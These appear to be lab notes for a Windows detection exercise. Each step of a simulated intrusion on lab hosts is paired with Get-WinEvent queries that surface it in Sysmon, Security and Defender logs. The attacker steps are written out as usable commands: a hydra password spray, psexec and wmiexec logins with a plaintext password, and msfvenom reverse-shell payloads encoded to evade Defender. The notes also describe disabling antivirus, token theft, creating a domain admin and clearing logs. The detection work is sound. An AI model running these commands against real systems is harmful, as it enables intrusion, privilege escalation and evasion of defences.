Password spray: hydra -L users.txt -P seasons-2023.txt 192.168.37.237 smb -u
Count successful (4624) and failed (4625) logins:
Get-WinEvent -Path C:\labs\valkyrie-security-logons.evtx | Group-Object id -NoElement | sort count
msfconsole
msf6 > use exploit/windows/smb/psexec
msf6 > set RHOSTS 192.168.37.237
msf6 > set SMBUser fgaeta
msf6 > set SMBPass W1nter2023!
msf6 > exploit
Service was created (before Defender killed it):
Get-WinEvent @{Path="C:\labs\valkyrie-system.evtx"; ID=7045}| fl
Command was executed (event 4688):
Get-WinEvent @{Path="C:\labs\valkyrie-security.evtx";id=4688}| Where {$_.Message -like "*powershell.exe -nop*"} | fl
Windows Defender Antivirus killed the connection:
Get-WinEvent @{Path="C:\labs\valkyrie-defender.evtx";id=1117} | Where {$_.Message -like "*powershell.exe -nop*"} | fl
wmiexec.py fgaeta:W1nter2023\!@192.168.37.237
Microsoft Defender Antivirus: zero logs.
Sysmon event 1 (and security event 4688) shows WmiPrvSE.exe
launching cmd.exe
and redirecting to the ADMIN$
share:
Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=1} | Where {$_.Message -like "*ADMIN$*"} | fl
Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";} | Where {$_.Message -like "*whoami*"} | fl
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.37.203 LPORT=8080 -x notepad.exe -f exe > plan.exe
Attacker uploads plan.exe
via wmiexex.py's lput
, tries to run it, and fails:
Upload:
Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=11} | Where {$_.Message -like "*plan.exe*"} | fl
The command executed:
Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=1} | Where {$_.Message -like "*Image: C:\Users\fgaeta\plan.exe*"} | fl
Then Windows Defender killed it:
Get-WinEvent @{Path="C:\labs\valkyrie-defender.evtx";id=1116} | Where {$_.Message -like "*plan.exe*"} | fl | more
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.37.203 LPORT=8080 -i 10 -e x64/xor_dynamic -x notepad.exe -f exe > plan.exe
The key difference: -e x64/xor_dynamic
Upload and execute:
Reverse meterpreter shell connects to Metasploit:
Upload/execution: same events as before.
Reverse shell connection to port 8080:
Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=3} | Where {$_.Message -like "*plan.exe*"} | fl
getsystem
fails, so the attacker enables RDP
The attacker then logs in via RDP and disables Windows Defender Antivirus:
Windows Defender Antivirus kills the getsystem
command
Get-WinEvent @{Path="C:\labs\valkyrie-defender.evtx";id=1117} | fl | more
RDP is enabled:
Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=1} | Where {$_.Message -like "*remotedesktop*"} | fl
Get-WinEvent @{Path="C:\labs\valkyrie-system.evtx"; ID=7040}| Where {$_.Message -like "*remote*"} | fl
getsystem
is successful, so attacker migrates the meterpreter DLL to another process and steals a domain admin token
Process migration:
Get-WinEvent @{Path="C:\labs\valkyrie-sysmon.evtx";id=8} | Where {$_.Message -like "*plan.exe*"} | fl
Nothing was logged during the token theft and impersonation of GALACTICA/Administrator.
Attacker runs meterpreter's shell
command:
Attacker creates a domain account:
Atracker uses wmic
to add new account to the domain admin group:
Account creation:
Get-WinEvent @{Path="\labs\pegasus-security.evtx"; id=4720} | fl
New domain admin:
Get-WinEvent @{Path="\labs\\pegasus-security.evtx"; id=4737} | fl
Get-WinEvent @{Path="C:\labs\valkyrie-security.evtx"; id=1102} | fl